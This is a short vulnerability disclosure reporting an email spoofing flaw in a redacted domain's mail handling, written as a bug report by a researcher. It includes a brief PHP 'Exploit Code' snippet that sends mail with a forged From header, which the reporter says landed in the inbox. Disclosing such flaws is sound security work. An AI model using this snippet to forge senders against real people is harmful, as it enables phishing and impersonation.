Email spoofing in [email protected]

Hey, I've found *email spoofing* vulnerability in [email protected] Issue: ======== When I try to send a fake email from [email protected] is is an issue; because, fake mails should be sent into the 'spam' folder. ### Exploit Code: ``` <?php $to = "[email protected]"; $subject = "test by ahsan"; $txt = "testing"; $headers = "From: [email protected]"; mail($to,$subject,$txt,$headers); ?> ``` When I tried to run it as a web-app in my browser, like, I created a file in my server (e.g test.php) and in that file I put this exploit code, and saved it when i run it like myserver.com/test.php it showed a blank white page, and next i checked out my email and i received an email from [email protected] into my **inbox** saying 'testing' I hope you'll fix it soon.. :-) Thanks, Ahsan Tahir